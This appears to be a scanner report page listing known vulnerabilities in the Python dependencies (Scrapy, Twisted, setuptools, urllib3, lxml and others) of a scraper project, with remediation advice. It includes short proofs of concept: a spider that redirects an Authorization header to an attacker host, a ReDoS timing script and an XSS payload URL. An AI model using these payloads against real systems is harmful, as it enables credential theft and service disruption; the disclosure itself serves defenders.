ZoranPandovski/ProdirectScraper:requirements.txt
Find, fix and prevent vulnerabilities in your code.
high severity
- Vulnerable module: scrapy
- Introduced through: scrapy@1.8.2
Detailed paths
-
Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a › scrapy@1.8.2Remediation: Upgrade to scrapy@1.8.4.
Overview
Scrapy is a high-level web crawling and web scraping framework, used to crawl websites and extract structured data from their pages.
Affected versions of this package are vulnerable to Improper Resource Shutdown or Release due to the enforcement of response size limits only during the download of raw, usually-compressed response bodies and not during decompression. A malicious website being scraped could send a small response that, upon decompression, could exhaust the memory available to the process, potentially affecting any other process sharing that memory, and affecting disk usage in case of uncompressed response caching.
Remediation
Upgrade Scrapy
to version 1.8.4, 2.11.1 or higher.
References
high severity
- Vulnerable module: scrapy
- Introduced through: scrapy@1.8.2
Detailed paths
-
Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a › scrapy@1.8.2Remediation: Upgrade to scrapy@2.11.1.
Overview
Scrapy is a high-level web crawling and web scraping framework, used to crawl websites and extract structured data from their pages.
Affected versions of this package are vulnerable to Information Exposure Through Sent Data due to the failure to remove the Authorization
header when redirecting across domains. An attacker can potentially allow for account hijacking by exploiting the exposure of the Authorization
header to unauthorized actors.
PoC
class QuotesSpider(scrapy.Spider):
name = "quotes"
def start_requests(self):
urls = [
'http://mysite.com/redirect.php?url=http://attacker.com:8182/xx',
]
for url in urls:
yield scrapy.Request(url=url,cookies={'currency': 'USD', 'country': 'UY'},headers={'Authorization':'Basic YWxhZGRpbjpvcGVuc2VzYW1l'},callback=self.parse)
def parse(self, response):
page = response.url.split("/")[-2]
filename = f'quotes-{page}.html'
with open(filename, 'wb') as f:
f.write(response.body)
self.log(f'Saved file {filename}')
Remediation
Upgrade Scrapy
to version 2.11.1 or higher.
References
high severity
- Vulnerable module: scrapy
- Introduced through: scrapy@1.8.2
Detailed paths
-
Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a › scrapy@1.8.2Remediation: Upgrade to scrapy@1.8.4.
Overview
Scrapy is a high-level web crawling and web scraping framework, used to crawl websites and extract structured data from their pages.
Affected versions of this package are vulnerable to Origin Validation Error due to the improper handling of the Authorization
header during cross-domain redirects. An attacker can leak sensitive information by inducing the server to redirect a request with the Authorization
header to a different domain.
Workarounds
1)Make sure that the Authentication header, either directly or through some third-party plugin is not used.
2)If that header is needed in some requests, add dont_redirect: True
to the request.meta
dictionary of those requests to disable following redirects for them.
3)If same domain redirect support is needed on those requests, make sure you trust the target website not to redirect your requests to a different domain.
Remediation
Upgrade Scrapy
to version 1.8.4, 2.11.1 or higher.
References
high severity
- Vulnerable module: scrapy
- Introduced through: scrapy@1.8.2
Detailed paths
-
Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a › scrapy@1.8.2Remediation: Upgrade to scrapy@1.8.4.
Overview
Scrapy is a high-level web crawling and web scraping framework, used to crawl websites and extract structured data from their pages.
Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) via the XMLFeedSpider
class or any subclass that uses the default node iterator iternodes
, as well as direct uses of the scrapy.utils.iterators.xmliter
function. An attacker can cause extreme CPU and memory usage during the parsing of its content by handling a malicious response.
Note:
For versions 2.6.0 to 2.11.0, the vulnerable function is open_in_browser
for a response without a base tag.
Workaround
- For
XMLFeedSpider
, switch the node iterator toxml
orhtml
. - For
open_in_browser
, before using the function, either manually review the response content to discard a ReDoS attack or manually define the base tag to avoid its automatic definition byopen_in_browser
later.
Details
Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.
The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.
Let’s take the following regular expression as an example:
regex = /A(B|C+)+D/
This regular expression accomplishes the following:
A
The string must start with the letter 'A'(B|C+)+
The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the+
matches one or more times). The+
at the end of this section states that we can look for one or more matches of this section.D
Finally, we ensure this section of the string ends with a 'D'
The expression would match inputs such as ABBD
, ABCCCCD
, ABCBCCCD
and ACCCCCD
It most cases, it doesn't take very long for a regex engine to find a match:
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total
The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.
Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.
Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:
- CCC
- CC+C
- C+CC
- C+C+C.
The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.
From there, the number of steps the engine must use to validate a string just continues to grow.
String | Number of C's | Number of steps |
---|---|---|
ACCCX | 3 | 38 |
ACCCCX | 4 | 71 |
ACCCCCX | 5 | 136 |
ACCCCCCCCCCCCCCX | 14 | 65,553 |
By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.
Remediation
Upgrade Scrapy
to version 1.8.4, 2.11.1 or higher.
References
high severity
- Vulnerable module: scrapy
- Introduced through: scrapy@1.8.2
Detailed paths
-
Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a › scrapy@1.8.2Remediation: Upgrade to scrapy@2.11.1.
Overview
Scrapy is a high-level web crawling and web scraping framework, used to crawl websites and extract structured data from their pages.
Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) when parsing content. An attacker can cause extreme CPU and memory usage by handling a malicious response.
PoC
import re
import time
import math
def convert_size(size_bytes):
if size_bytes == 0:
return "0B"
size_name = ("B", "KB", "MB", "GB", "TB", "PB", "EB", "ZB", "YB")
i = int(math.floor(math.log(size_bytes, 1024)))
p = math.pow(1024, i)
s = round(size_bytes / p, 2)
return "%s %s" % (s, size_name[i])
END_TAG_RE = re.compile(r"<\s*/([^\s>]+)\s*>", re.S)
len_lists = [10000, 20000, 50000, 100000, 500000, 1000000]
for n in len_lists:
st = time.time()
header_end = '</'*n
re.findall(END_TAG_RE, header_end)
et = time.time()
elapsed_time = et - st
print(f'Execution time with len = {n} ~ {convert_size(len(header_end))}:
Details
Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.
The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.
Let’s take the following regular expression as an example:
regex = /A(B|C+)+D/
This regular expression accomplishes the following:
A
The string must start with the letter 'A'(B|C+)+
The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the+
matches one or more times). The+
at the end of this section states that we can look for one or more matches of this section.D
Finally, we ensure this section of the string ends with a 'D'
The expression would match inputs such as ABBD
, ABCCCCD
, ABCBCCCD
and ACCCCCD
It most cases, it doesn't take very long for a regex engine to find a match:
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total
The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.
Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.
Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:
- CCC
- CC+C
- C+CC
- C+C+C.
The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.
From there, the number of steps the engine must use to validate a string just continues to grow.
String | Number of C's | Number of steps |
---|---|---|
ACCCX | 3 | 38 |
ACCCCX | 4 | 71 |
ACCCCCX | 5 | 136 |
ACCCCCCCCCCCCCCX | 14 | 65,553 |
By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.
Remediation
Upgrade Scrapy
to version 2.11.1 or higher.
References
high severity
- Vulnerable module: setuptools
- Introduced through: mock@2.0.0, twisted@23.8.0 and others
Detailed paths
-
Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a › mock@2.0.0 › pbr@6.1.1 › setuptools@40.5.0
-
Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a › twisted@23.8.0 › zope-interface@? › setuptools@40.5.0
-
Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a › scrapy@1.8.2 › zope.interface@6.4.post2 › setuptools@40.5.0
-
Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a › scrapy@1.8.2 › twisted@23.8.0 › zope-interface@? › setuptools@40.5.0
…and 1 more
Overview
Affected versions of this package are vulnerable to Improper Control of Generation of Code ('Code Injection') through the package_index
module's download functions due to the unsafe usage of os.system
. An attacker can execute arbitrary commands on the system by providing malicious URLs or manipulating the URLs retrieved from package index servers.
Note
Because easy_install
and package_index
are deprecated, the exploitation surface is reduced, but it's conceivable through social engineering or minor compromise to a package index could grant remote access.
Remediation
Upgrade setuptools
to version 70.0.0 or higher.
References
medium severity
- Vulnerable module: twisted
- Introduced through: twisted@23.8.0 and scrapy@1.8.2
Detailed paths
-
Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a › twisted@23.8.0Remediation: Upgrade to twisted@24.7.0.
-
Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a › scrapy@1.8.2 › twisted@23.8.0Remediation: Upgrade to scrapy@1.8.2.
Overview
Twisted is an event-based network programming and multi-protocol integration framework.
Affected versions of this package are vulnerable to HTTP Response Smuggling. When sending multiple HTTP/1.1 requests in one TCP segment, twisted.web does not guarantee the response order. An attacker in control of an endpoint can manipulate a different user's second response to a pipelined chunked request by delaying the response to their own request. Information disclosure across sessions may also be possible for reverse proxy servers using pooled connections.
Workaround
This vulnerability can be avoided by enforcing HTTP/2, as it is only vulnerable for HTTP/1.x traffic.
Remediation
Upgrade Twisted
to version 24.7.0rc1 or higher.
References
medium severity
- Vulnerable module: zipp
- Introduced through: twisted@23.8.0 and scrapy@1.8.2
Detailed paths
-
Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a › twisted@23.8.0 › attrs@24.2.0 › importlib-metadata@6.7.0 › zipp@3.15.0Remediation: Upgrade to twisted@23.8.0.
-
Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a › scrapy@1.8.2 › service-identity@21.1.0 › attrs@24.2.0 › importlib-metadata@6.7.0 › zipp@3.15.0Remediation: Upgrade to scrapy@1.8.4.
-
Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a › scrapy@1.8.2 › twisted@23.8.0 › attrs@24.2.0 › importlib-metadata@6.7.0 › zipp@3.15.0Remediation: Upgrade to scrapy@1.8.2.
Overview
Affected versions of this package are vulnerable to Infinite loop where an attacker can cause the application to stop responding by initiating a loop through functions affecting the Path
module, such as joinpath
, the overloaded division operator, and iterdir
.
Details
Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.
Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.
One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.
When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.
Two common types of DoS vulnerabilities:
High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.
Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm
ws
package
Remediation
Upgrade zipp
to version 3.19.1 or higher.
References
medium severity
- Vulnerable module: scrapy
- Introduced through: scrapy@1.8.2
Detailed paths
-
Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a › scrapy@1.8.2Remediation: Upgrade to scrapy@2.11.2.
Overview
Scrapy is a high-level web crawling and web scraping framework, used to crawl websites and extract structured data from their pages.
Affected versions of this package are vulnerable to Files or Directories Accessible to External Parties via the DOWNLOAD_HANDLERS
setting. An attacker can redirect traffic to unintended protocols such as file://
or s3://
, potentially accessing sensitive data or credentials by manipulating the start URLs of a spider and observing the output.
Notes:
HTTP redirects should only work between URLs that use the
http://
orhttps://
schemes.A malicious actor, given write access to the start requests of a spider and read access to the spider output, could exploit this vulnerability to:
a) Redirect to any local file using the file:// scheme to read its contents.
b) Redirect to an ftp:// URL of a malicious FTP server to obtain the FTP username and password configured in the spider or project.
c) Redirect to any s3:// URL to read its content using the S3 credentials configured in the spider or project.
A spider that always outputs the entire contents of a response would be completely vulnerable.
A spider that extracted only fragments from the response could significantly limit vulnerable data.
Remediation
Upgrade Scrapy
to version 2.11.2 or higher.
References
medium severity
- Vulnerable module: urllib3
- Introduced through: scrapy@1.8.2
Detailed paths
-
Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a › scrapy@1.8.2 › tldextract@4.0.0 › requests@2.31.0 › urllib3@2.0.7Remediation: Upgrade to scrapy@2.0.0.
-
Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a › scrapy@1.8.2 › tldextract@4.0.0 › requests-file@2.1.0 › requests@2.31.0 › urllib3@2.0.7Remediation: Upgrade to scrapy@2.0.0.
Overview
urllib3 is a HTTP library with thread-safe connection pooling, file post, and more.
Affected versions of this package are vulnerable to Improper Removal of Sensitive Information Before Storage or Transfer due to the improper handling of the Proxy-Authorization
header during cross-origin redirects when ProxyManager
is not in use. When the conditions below are met, including non-recommended configurations, the contents of this header can be sent in an automatic HTTP redirect.
Notes:
To be vulnerable, the application must be doing all of the following:
Setting the
Proxy-Authorization
header without using urllib3's built-in proxy support.Not disabling HTTP redirects (e.g. with
redirects=False
)Either not using an HTTPS origin server, or having a proxy or target origin that redirects to a malicious origin.
Workarounds
Using the
Proxy-Authorization
header with urllib3'sProxyManager
.Disabling HTTP redirects using
redirects=False
when sending requests.Not using the
Proxy-Authorization
header.
Remediation
Upgrade urllib3
to version 1.26.19, 2.2.2 or higher.
References
medium severity
- Vulnerable module: scrapy
- Introduced through: scrapy@1.8.2
Detailed paths
-
Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a › scrapy@1.8.2Remediation: Upgrade to scrapy@2.11.2.
Overview
Scrapy is a high-level web crawling and web scraping framework, used to crawl websites and extract structured data from their pages.
Affected versions of this package are vulnerable to Exposure of Sensitive Information to an Unauthorized Actor due to improper handling of HTTP headers during cross-origin redirects. An attacker can intercept the Authorization
header and potentially access sensitive information by exploiting this misconfiguration in redirect scenarios where the domain remains the same but the scheme or port changes.
Note: In the context of a man-in-the-middle attack, this could be used to get access to the value of that Authorization header.
Remediation
Upgrade Scrapy
to version 2.11.2 or higher.
References
medium severity
- Vulnerable module: scrapy
- Introduced through: scrapy@1.8.2
Detailed paths
-
Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a › scrapy@1.8.2Remediation: Upgrade to scrapy@2.6.0.
Overview
Scrapy is a high-level web crawling and web scraping framework, used to crawl websites and extract structured data from their pages.
Affected versions of this package are vulnerable to Information Exposure in which a spider could leak cookie headers when being forwarded to a third party, potentially attacker-controlled website.
Remediation
Upgrade Scrapy
to version 2.6.0 or higher.
References
medium severity
- Vulnerable module: setuptools
- Introduced through: mock@2.0.0, twisted@23.8.0 and others
Detailed paths
-
Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a › mock@2.0.0 › pbr@6.1.1 › setuptools@40.5.0
-
Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a › twisted@23.8.0 › zope-interface@? › setuptools@40.5.0
-
Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a › scrapy@1.8.2 › zope.interface@6.4.post2 › setuptools@40.5.0
-
Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a › scrapy@1.8.2 › twisted@23.8.0 › zope-interface@? › setuptools@40.5.0
…and 1 more
Overview
Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) via crafted HTML package or custom PackageIndex
page.
Note:
Only a small portion of the user base is impacted by this flaw. Setuptools maintainers pointed out that package_index
is deprecated (not formally, but “in spirit”) and the vulnerability isn't reachable through standard, recommended workflows.
Details
Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.
The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.
Let’s take the following regular expression as an example:
regex = /A(B|C+)+D/
This regular expression accomplishes the following:
A
The string must start with the letter 'A'(B|C+)+
The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the+
matches one or more times). The+
at the end of this section states that we can look for one or more matches of this section.D
Finally, we ensure this section of the string ends with a 'D'
The expression would match inputs such as ABBD
, ABCCCCD
, ABCBCCCD
and ACCCCCD
It most cases, it doesn't take very long for a regex engine to find a match:
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total
The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.
Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.
Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:
- CCC
- CC+C
- C+CC
- C+C+C.
The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.
From there, the number of steps the engine must use to validate a string just continues to grow.
String | Number of C's | Number of steps |
---|---|---|
ACCCX | 3 | 38 |
ACCCCX | 4 | 71 |
ACCCCCX | 5 | 136 |
ACCCCCCCCCCCCCCX | 14 | 65,553 |
By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.
Remediation
Upgrade setuptools
to version 65.5.1 or higher.
References
medium severity
- Vulnerable module: requests
- Introduced through: scrapy@1.8.2
Detailed paths
-
Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a › scrapy@1.8.2 › tldextract@4.0.0 › requests@2.31.0Remediation: Upgrade to scrapy@2.0.0.
-
Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a › scrapy@1.8.2 › tldextract@4.0.0 › requests-file@2.1.0 › requests@2.31.0Remediation: Upgrade to scrapy@2.0.0.
Overview
Affected versions of this package are vulnerable to Always-Incorrect Control Flow Implementation when making requests through a Requests Session
. An attacker can bypass certificate verification by making the first request with verify=False
, causing all subsequent requests to ignore certificate verification regardless of changes to the verify
value.
Notes:
For requests <2.32.0, avoid setting
verify=False
for the first request to a host while using a Requests Session.For requests <2.32.0, call
close()
on Session objects to clear existing connections ifverify=False
is used.This vulnerability was initially fixed in version 2.32.0, which was yanked. Therefore, the next available fixed version is 2.32.2.
Remediation
Upgrade requests
to version 2.32.2 or higher.
References
medium severity
- Vulnerable module: lxml
- Introduced through: lxml@4.6.5 and scrapy@1.8.2
Detailed paths
-
Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a › lxml@4.6.5Remediation: Upgrade to lxml@4.9.1.
-
Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a › scrapy@1.8.2 › lxml@4.6.5Remediation: Upgrade to scrapy@1.8.4.
-
Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a › scrapy@1.8.2 › parsel@1.8.1 › lxml@4.6.5
Overview
Affected versions of this package are vulnerable to NULL Pointer Dereference in the iterwalk()
function (used by canonicalize
) that can be triggered by malicious input.
NOTE: This only applies when lxml is used together with libxml2 2.9.10 through 2.9.14.
Details
Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.
Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.
One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.
When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.
Two common types of DoS vulnerabilities:
High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.
Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm
ws
package
Remediation
Upgrade lxml
to version 4.9.1 or higher.
References
medium severity
- Vulnerable module: scrapy
- Introduced through: scrapy@1.8.2
Detailed paths
-
Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a › scrapy@1.8.2Remediation: Upgrade to scrapy@1.8.3.
Overview
Scrapy is a high-level web crawling and web scraping framework, used to crawl websites and extract structured data from their pages.
Affected versions of this package are vulnerable to Credential Exposure via the process_request()
function in downloadermiddlewares/httpproxy.py
. A proxy can leak credentials to another proxy if third-party downloader middlewares leave Proxy-Authentication
headers unchanged when updating proxy
metadata for a new request.
NOTE: To fully mitigate the effects of vulnerability, replacing or upgrading the third-party downloader middleware might be necessary after upgrading.
Remediation
Upgrade Scrapy
to version 1.8.3, 2.6.2 or higher.
References
medium severity
- Vulnerable module: twisted
- Introduced through: twisted@23.8.0 and scrapy@1.8.2
Detailed paths
-
Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a › twisted@23.8.0Remediation: Upgrade to twisted@23.10.0.
-
Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a › scrapy@1.8.2 › twisted@23.8.0Remediation: Upgrade to scrapy@1.8.2.
Overview
Twisted is an event-based network programming and multi-protocol integration framework.
Affected versions of this package are vulnerable to HTTP Response Smuggling. When sending multiple HTTP/1.1 requests in one TCP segment, twisted.web does not guarantee the response order. An attacker in control of an endpoint can manipulate a different user's second response to a pipelined chunked request by delaying the response to their own request.
Workaround
This vulnerability can be avoided by enforcing HTTP/2, as it is only vulnerable for HTTP/1.x traffic.
Remediation
Upgrade Twisted
to version 23.10.0rc1 or higher.
References
medium severity
- Vulnerable module: scrapy
- Introduced through: scrapy@1.8.2
Detailed paths
-
Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a › scrapy@1.8.2
Overview
via S3FilesStore
. Files are stored in memory before uploaded to s3, increasing memory usage if giant or many files are being uploaded at the same time.
References
medium severity
- Vulnerable module: twisted
- Introduced through: twisted@23.8.0 and scrapy@1.8.2
Detailed paths
-
Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a › twisted@23.8.0Remediation: Upgrade to twisted@24.7.0.
-
Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a › scrapy@1.8.2 › twisted@23.8.0Remediation: Upgrade to scrapy@1.8.2.
Overview
Twisted is an event-based network programming and multi-protocol integration framework.
Affected versions of this package are vulnerable to Cross-site Scripting (XSS) when the victim is using Firefox, due to an unescaped URL in the redirectTo()
function. A site which is vulnerable to open redirects by other means can be can be made to execute scripts injected into a redirect URL.
PoC
http://127.0.0.1:9009?url=ws://example.com/"><script>alert(document.location)</script>
Details
A cross-site scripting attack occurs when the attacker tricks a legitimate web-based application or site to accept a request as originating from a trusted source.
This is done by escaping the context of the web application; the web application then delivers that data to its users along with other trusted dynamic content, without validating it. The browser unknowingly executes malicious script on the client side (through client-side languages; usually JavaScript or HTML) in order to perform actions that are otherwise typically blocked by the browser’s Same Origin Policy.
Injecting malicious code is the most prevalent manner by which XSS is exploited; for this reason, escaping characters in order to prevent this manipulation is the top method for securing code against this vulnerability.
Escaping means that the application is coded to mark key characters, and particularly key characters included in user input, to prevent those characters from being interpreted in a dangerous context. For example, in HTML, <
can be coded as <
; and >
can be coded as >
; in order to be interpreted and displayed as themselves in text, while within the code itself, they are used for HTML tags. If malicious content is injected into an application that escapes special characters and that malicious content uses <
and >
as HTML tags, those characters are nonetheless not interpreted as HTML tags by the browser if they’ve been correctly escaped in the application code and in this way the attempted attack is diverted.
The most prominent use of XSS is to steal cookies (source: OWASP HttpOnly) and hijack user sessions, but XSS exploits have been used to expose sensitive information, enable access to privileged services and functionality and deliver malware.
Types of attacks
There are a few methods by which XSS can be manipulated:
Type | Origin | Description |
---|---|---|
Stored | Server | The malicious code is inserted in the application (usually as a link) by the attacker. The code is activated every time a user clicks the link. |
Reflected | Server | The attacker delivers a malicious link externally from the vulnerable web site application to a user. When clicked, malicious code is sent to the vulnerable web site, which reflects the attack back to the user’s browser. |
DOM-based | Client | The attacker forces the user’s browser to render a malicious page. The data in the page itself delivers the cross-site scripting data. |
Mutated | The attacker injects code that appears safe, but is then rewritten and modified by the browser, while parsing the markup. An example is rebalancing unclosed quotation marks or even adding quotation marks to unquoted parameters. |
Affected environments
